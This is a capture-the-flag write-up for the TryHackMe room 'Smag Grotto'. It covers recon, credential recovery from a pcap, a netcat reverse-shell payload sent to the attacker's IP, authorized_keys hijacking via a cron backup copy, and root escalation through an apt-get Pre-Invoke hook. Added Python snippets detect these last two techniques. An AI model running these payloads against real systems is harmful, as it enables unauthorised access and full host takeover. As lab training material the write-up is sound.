Smag_Grotto TryHackMe
Level: Easy
Let's get started
Recon
PortScanning
command:sudo nmap -A 10.10.161.219 -T4 -v -p-
# Nmap 7.93 scan initiated Mon Jun 26 10:13:41 2023 as: nmap -A -T4 -v -p- -oN smag_grotto 10.10.161.219
Increasing send delay for 10.10.161.219 from 0 to 5 due to 1587 out of 3966 dropped probes since last increase.
Increasing send delay for 10.10.161.219 from 5 to 10 due to 11 out of 19 dropped probes since last increase.
Nmap scan report for 10.10.161.219
Host is up (0.25s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 74e0e1b405856a15687e16daf2c76bee (RSA)
| 256 bd4362b9a1865136f8c7dff90f638fa3 (ECDSA)
|_ 256 f9e7da078f10af970b3287c932d71b76 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Smag
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
Aggressive OS guesses: Linux 5.4 (96%), ASUS RT-N56U WAP (Linux 3.4) (94%), Linux 3.16 (94%), Linux 3.1 (93%), Linux 3.2 (93%), Linux 3.10 - 3.13 (92%), Linux 3.2 - 3.16 (92%), Linux 3.2 - 4.9 (92%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (92%), Crestron XPanel control system (91%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 0.003 days (since Mon Jun 26 10:29:34 2023)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=255 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 5900/tcp)
HOP RTT ADDRESS
1 264.81 ms 10.8.0.1
2 264.86 ms 10.10.161.219
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jun 26 10:34:03 2023 -- 1 IP address (1 host up) scanned in 1222.08 seconds
From our scan we have 2 open ports, port 22 which runs ssh and port 80 which runs http. Enumeration today will be focused on port 80.
Enumeration
Navigating to the webpage
We get the message "this site is still heavily under development". I checked the page source as well, but there was nothing there.
Firing up our directory enumeration tool
command:ffuf -u "http://10.10.161.219/FUZZ" -w /usr/share/wordlists/dirb/common.txt -e .zip,.sql,.php,.phtml,.bak,.backup
:: Method : GET
:: URL : http://10.10.161.219/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/common.txt
:: Extensions : .zip .sql .php .phtml .bak .backup
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________
index.php [Status: 200, Size: 402, Words: 69, Lines: 13, Duration: 225ms]
index.php [Status: 200, Size: 402, Words: 69, Lines: 13, Duration: 214ms]
mail [Status: 301, Size: 313, Words: 20, Lines: 10, Duration: 216ms]
:: Progress: [32298/32298] :: Job [1/1] :: 211 req/sec :: Duration: [0:03:10] :: Errors: 0 ::
Cool, we found a /mail directory
Navigating to that directory
We are able to read their mail, and one message has a pcap file attached. Let's download the file to our machine and analyze it.
Cool stuff, we'll be analyzing this pcap file with Wireshark, a tool that comes preinstalled on Kali Linux.
After looking through the capture for a little while, I found something interesting.
Right-clicking on an "HTTP" packet and following the "TCP" stream
Cool stuff hehe. We found a hostname, a username and a password sent over plain HTTP.
Let's add the hostname to our /etc/hosts file
Navigating to the webpage
Clicking on admin.php
We are required to log in. We'll be using the creds we found earlier when we were analyzing the pcap file
username:helpdesk
password:cH4nG3M3_n0w
Nice, we are logged in.
Enter a command?? How about we try the command "fly"?? lool just kidding. We are required to use Linux commands here
Let's start with id and whoami. These commands don't display any output, so I went ahead to get a shell.
Payload:rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.8.133.215 1234 >/tmp/f
You can edit the IP address to that of your kali machine.
Setting up our netcat listener
Now, lets paste the payload
Checking our netcat listener;
Cool, we got a shell
Stabilizing the shell
commands:
python3 -c "import pty;pty.spawn('/bin/bash')"
ctrl + z (to background)
stty raw -echo;fg
export TERM=screen
Now, let's go ahead and escalate our privileges
Privilege Escalation
So I found a cron job running
command:cat /etc/crontab
The job copies /opt/.backups/jake_id_rsa.pub.backup into jake's .ssh/authorized_keys, so if we can overwrite that backup file we control what ends up in authorized_keys
Now, let's generate our own SSH key pair using the ssh-keygen command
command:ssh-keygen -f gabimaru
I used the name gabimaru; you can choose a name of your own though
So, we'll be writing the contents of gabimaru.pub into .backups/jake_id_rsa.pub.backup
Let's send the file over to the target machine first
Now, let's overwrite the file
command:cp gabimaru.pub /opt/.backups/jake_id_rsa.pub.backup
Now that was successful. Let's wait a few minutes for the cron job to run, then we can go ahead and log in as user jake
command:ssh jake@10.10.161.219 -i gabimaru
Cool, we have a shell as user jake
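The cron-job weakness above is easy to audit for from the defender's side: a root cron entry that copies a file unprivileged users can modify into a sensitive destination. This is an added example, not code from the room or from the original post; the crontab text is constructed to mirror the job described above, and the sensitive-path list is an assumption.

```python
import os
import re
import stat
import tempfile

# Constructed crontab text modelled on the backup-copy job described above.
SAMPLE_CRONTAB = """\
# m h dom mon dow user  command
*/1 * * * * root cp /opt/.backups/jake_id_rsa.pub.backup /home/jake/.ssh/authorized_keys
"""

SENSITIVE_DESTS = ("authorized_keys", "/etc/sudoers", "/etc/passwd", "/etc/shadow")
CP_RE = re.compile(r"\bcp\s+(?:-\S+\s+)*(\S+)\s+(\S+)")

def world_writable(path):
    """True if the file exists and any user can write to it."""
    try:
        return bool(os.stat(path).st_mode & stat.S_IWOTH)
    except FileNotFoundError:
        return False

def audit_crontab(text, is_writable=world_writable):
    """Return (src, dst) pairs for jobs copying a world-writable file into a sensitive path."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 6)  # m h dom mon dow user command
        if len(fields) < 7:
            continue
        match = CP_RE.search(fields[6])
        if not match:
            continue
        src, dst = match.groups()
        if dst.endswith(SENSITIVE_DESTS) and is_writable(src):
            findings.append((src, dst))
    return findings

def demo():
    """Create a world-writable stand-in for the backup file and check it is flagged."""
    with tempfile.NamedTemporaryFile("w", suffix=".pub.backup", delete=False) as f:
        f.write("ssh-ed25519 AAAA...constructed-key...\n")
        src = f.name
    os.chmod(src, 0o666)
    crontab = f"*/1 * * * * root cp {src} /home/jake/.ssh/authorized_keys\n"
    findings = audit_crontab(crontab)
    os.unlink(src)
    return findings
```

Run audit_crontab on the real /etc/crontab (and the files under /etc/cron.d) to catch this pattern before a cron job turns a writable backup into an SSH login.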
Further escalating our privileges
Checking to see the programs sudo allows the user to run
command:sudo -l
User jake can run the apt-get command with sudo privileges.
Sweet, let's use this to escalate our privileges
Picking a payload from GTFOBins
payload:sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh
Let's just paste this into the target machine. Hopefully we'll get a shell as root
Cool stuff, we got a shell as root
That will be all for today
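Because sudo logs every command it runs, the apt-get hook trick above leaves a clear trace in auth.log. This added example (not part of the original post) parses sudo records and flags apt invocations that set a Pre-Invoke, Post-Invoke or Pre-Install-Pkgs hook; the log lines are constructed in the format sudo writes on Ubuntu.

```python
import re

# Constructed auth.log lines in the format sudo logs on Ubuntu; the second and
# third commands mirror the apt hook-option technique described above.
SAMPLE_AUTH_LOG = """\
Jun 26 10:40:01 smag sudo:     jake : TTY=pts/0 ; PWD=/home/jake ; USER=root ; COMMAND=/usr/bin/apt-get update
Jun 26 10:41:13 smag sudo:     jake : TTY=pts/0 ; PWD=/home/jake ; USER=root ; COMMAND=/usr/bin/apt-get update -o APT::Update::Pre-Invoke::=/bin/sh
Jun 26 10:42:07 smag sudo:     jake : TTY=pts/0 ; PWD=/home/jake ; USER=root ; COMMAND=/usr/bin/apt-get install -o Dpkg::Pre-Install-Pkgs::=/bin/bash vim
"""

SUDO_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ [\d:]+) (?P<host>\S+) sudo:\s+(?P<user>\S+) : .*?"
    r"USER=(?P<target>\S+) ; COMMAND=(?P<cmd>.*)$"
)
# apt/dpkg configuration hooks that run an arbitrary program with apt's privileges
HOOK_RE = re.compile(
    r"(?:-o|--option)[\s=]*(APT::Update::(?:Pre|Post)-Invoke|DPkg::(?:Pre|Post)-Invoke"
    r"|DPkg::Pre-Install-Pkgs)::=",
    re.IGNORECASE,
)

def parse_sudo_line(line):
    """Split one sudo auth.log line into its fields, or None if it is not a sudo record."""
    match = SUDO_RE.match(line)
    return match.groupdict() if match else None

def find_apt_hook_abuse(log_text):
    """Return (timestamp, user, target_user, hook) for sudo runs of apt that set a hook."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_sudo_line(line)
        if rec is None or not rec["cmd"].strip():
            continue
        prog = rec["cmd"].split()[0].rsplit("/", 1)[-1]
        hook = HOOK_RE.search(rec["cmd"])
        if prog in ("apt-get", "apt", "aptitude") and hook:
            hits.append((rec["ts"], rec["user"], rec["target"], hook.group(1)))
    return hits
```

The lasting fix is to remove the apt-get sudo rule (or restrict it so no options can be passed); the detector only tells you the rule was abused.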